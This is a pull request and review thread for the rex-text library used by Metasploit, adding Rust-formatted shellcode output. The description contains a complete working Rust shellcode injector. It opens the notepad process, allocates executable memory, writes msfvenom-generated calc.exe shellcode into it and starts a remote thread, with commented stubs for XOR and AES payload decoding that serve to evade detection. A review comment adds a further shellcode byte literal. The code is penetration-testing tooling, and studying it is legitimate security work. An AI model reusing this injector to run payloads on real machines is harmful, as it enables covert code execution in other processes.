### PR TITLE
Adding support for Rust formatted shellcode generation

### PR DESCRIPTION
**Pull request by memN0ps**
This PR adds support for Rust shellcode generation which supports both `rust` and `rustlang` formats. Please note that a mutable vector has been created by default so it is compatible with [PVOID](https://docs.rs/winapi/latest/winapi/shared/ntdef/type.PVOID.html) when using [buf.as_mut_ptr()](https://doc.rust-lang.org/std/vec/struct.Vec.html#method.as_mut_ptr)

Example `msfvenom` Rust shellcode for `calc.exe`:
msf-calc

Example `msfconsole` Rust shellcode for `calc.exe`:
msfconsole-calc

This has been tested with my own [Rust basic shellcode injector](https://github.com/memN0ps/arsenal-rs/tree/main/shellcode_runner_classic-rs)

```rust
//use libaes::Cipher;
use sysinfo::{Pid, ProcessExt, SystemExt};

use std::{
    default::Default,
    ffi::c_void,
    ptr::null_mut,
};

use ntapi::{
    ntpsapi::{NtOpenProcess, NtCreateThreadEx},
    ntmmapi::{NtAllocateVirtualMemory, NtWriteVirtualMemory},
    ntapi_base::{CLIENT_ID}
};

use winapi::{
    um::{
        winnt::{MEM_COMMIT, PAGE_EXECUTE_READWRITE, MEM_RESERVE, MAXIMUM_ALLOWED},
        lmaccess::{ACCESS_ALL}
    },
    shared::{
        ntdef::{OBJECT_ATTRIBUTES, HANDLE, NT_SUCCESS}
    }
};

fn main() {
    let process_id = get_process_id_by_name("notepad");

    println!("process ID: {}", process_id);

    inject_shellcode(process_id);
}

fn inject_shellcode(process_id: Pid) {

    unsafe {
        let mut oa = OBJECT_ATTRIBUTES::default();

        let mut process_handle = process_id as HANDLE;

        let mut ci = CLIENT_ID {
            UniqueProcess: process_handle,
            UniqueThread: null_mut(),
        };


        let mut status = NtOpenProcess(&mut process_handle, ACCESS_ALL, &mut oa, &mut ci);

        if !NT_SUCCESS(status) {
            panic!("Error opening process: {}", status);
        }

        //
        //xor encrypted shellcode goes here.
        //

        //let xor_shellcode: Vec<u8> = vec![0x90, 0x90, 0x90];
        //let mut shellcode: Vec<u8> = xor_decode(&encoded_shellcode, 0xDA);

        //
        //aes encrypted shellcode goes here
        //

        //let aes_shellcode: Vec<u8> = vec![0x90, 0x90, 0x90];
        //let mut shellcode: Vec<u8> = aes_256_decrypt(&aes_shellcode, b"ABCDEFGHIJKLMNOPQRSTUVWXYZ-01337", b"This is 16 bytes");
        
        //
        //default shellcode goes here
        //

        //msfvenom -p windows/x64/exec CMD="calc.exe" -f rust
        let mut buf: Vec<u8> = vec![0xfc,0x48,0x83,0xe4,0xf0,0xe8,
        0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,
        0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
        0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,
        0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,
        0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,
        0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,
        0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,
        0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,
        0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,
        0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,
        0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,
        0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
        0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,
        0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,
        0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,
        0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,
        0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,
        0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,
        0x31,0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,
        0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,0x28,0x3c,
        0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,
        0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,
        0x63,0x2e,0x65,0x78,0x65,0x00];
                

        let mut shellcode_length = buf.len();

        let handle = process_handle as *mut c_void;
        let mut base_address : *mut c_void = null_mut();
        status = NtAllocateVirtualMemory(handle, &mut base_address, 0, &mut shellcode_length, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);


        if !NT_SUCCESS(status) {
            panic!("Error allocating  memory to the target process: {}", status);
        }

        let mut bytes_written = 0;

        let buffer = buf.as_mut_ptr() as *mut c_void;
        let buffer_length = buf.len();

        status = NtWriteVirtualMemory(handle, base_address, buffer, buffer_length, &mut bytes_written);

        if !NT_SUCCESS(status) {
            panic!("Error writing shellcode to memory of the target process: {}", status);
        }

        let mut thread_handle : *mut c_void = null_mut();

        status = NtCreateThreadEx(&mut thread_handle, MAXIMUM_ALLOWED, null_mut(), handle, base_address, null_mut(), 0, 0, 0, 0, null_mut());

        if !NT_SUCCESS(status) {
            panic!("Error failed to create remote thread: {}", status);
        }
    }   
}

fn get_process_id_by_name(target_process: &str) -> Pid {
    let mut system = sysinfo::System::new();
    system.refresh_all();

    let mut process_id = 0;

    for process in system.process_by_name(target_process) {
        process_id = process.pid();
    }

    return process_id;
}

/* 
fn xor_decode(shellcode: &Vec<u8>, key: u8) -> Vec<u8> {
    shellcode.iter().map(|x| x ^ key).collect()
}
*/

/* 
fn aes_256_decrypt(shellcode: &Vec<u8>, key: &[u8; 32], iv: &[u8; 16]) -> Vec<u8> {
    // Create a new 128-bit cipher
    let cipher = Cipher::new_256(key);    
    
    //Decryption
    let decrypted = cipher.cbc_decrypt(iv, &shellcode);

    decrypted
}
*/

/*
fn get_input() -> io::Result<()> {
    let mut buf = String::new();
    std::io::stdin().read_line(&mut buf)?;
    Ok(())
}

/// Used for debugging
fn pause() {
    match get_input() {
        Ok(buffer) => println!("{:?}", buffer),
        Err(error) => println!("error: {}", error),
    };
}*/
```

### CODE REVIEW

File: lib/rex/text/lang.rb [hunk 1]
```diff
@@ -86,6 +86,28 @@ def self.to_nim_comment(str,  wrap = DefaultWrap)
       return "#[\n" + wordwrap(str, 0, wrap, '', '') + "]#\n"
     end
 
+    #
+    # Converts to a Rust style array of bytes
+    #
+    def self.to_rust(str, wrap = DefaultWrap, name = "buf")
```
Comment (adfoster-r7) [inline lib/rex/text/lang.rb:92]: It looks like the generated code is tailored to make it easier to work with your workflow of using a mut vec directly with winapi; but is that what an average user would expect? Would they want something like a byte literal instead?

```rust
let buf = b"\xbe\xa0\xdf\xfe\x12\xda\xda\xd9\x74\x24\xf4\x5f\x31\xc9\
\xb1\x12\x83\xc7\x04\x31\x77\x0e\x03\xd7\xd1\x1c\xe7\x26\
\x35\x17\xeb\x1b\x8a\x8b\x86\x99\x85\xcd\xe7\xfb\x58\x8d\
\x9b\x5a\xd3\xb1\x56\xdc\x5a\xb7\x91\xb4\x9c\xef\x63\xdc\
\x75\xf2\x63\xcd\xd9\x7b\x82\x5d\x87\x2b\x14\xce\xfb\xcf\
\x1f\x11\x36\x4f\x4d\xb9\xa7\x7f\x01\x51\x50\xaf\xca\xc3\
\xc9\x26\xf7\x51\x59\xb0\x19\xe5\x56\x0f\x59";
```

Or we could output it with array syntax using `_u8` on the first byte and folk can add the extra mut/vec! ceremonies if they want to, as that seems specific to the injection technique that you're using

```
let buf = [0xfc_u8,0x48,0x83,0xe4,...];
```

I believe that would align closer with the current C format output, which doesn't use `malloc` for instance. Open to further discussion here of course :+1:

**Comment by gwillcox-r7** [comment]
@memN0ps You may want to change this so that you aren't trying to make this contribution from your `master` branch but rather from a unique branch dedicated to this feature.

**Comment by memN0ps** [comment]
Sorry, done, thanks :)

File: lib/rex/text/lang.rb (hunk 1 above)
Comment (memN0ps) [reply lib/rex/text/lang.rb:92]: I think it comes down to preference if someone wants to use a vector (heap-allocated) or array (stack-allocated) and can be situational. I have changed it to be an array by default as requested in the new PR https://github.com/rapid7/rex-text/pull/58 but I don't think it matters too much as changing the type is not difficult.

Thanks for the insight though :)

**Pull request closed without merging**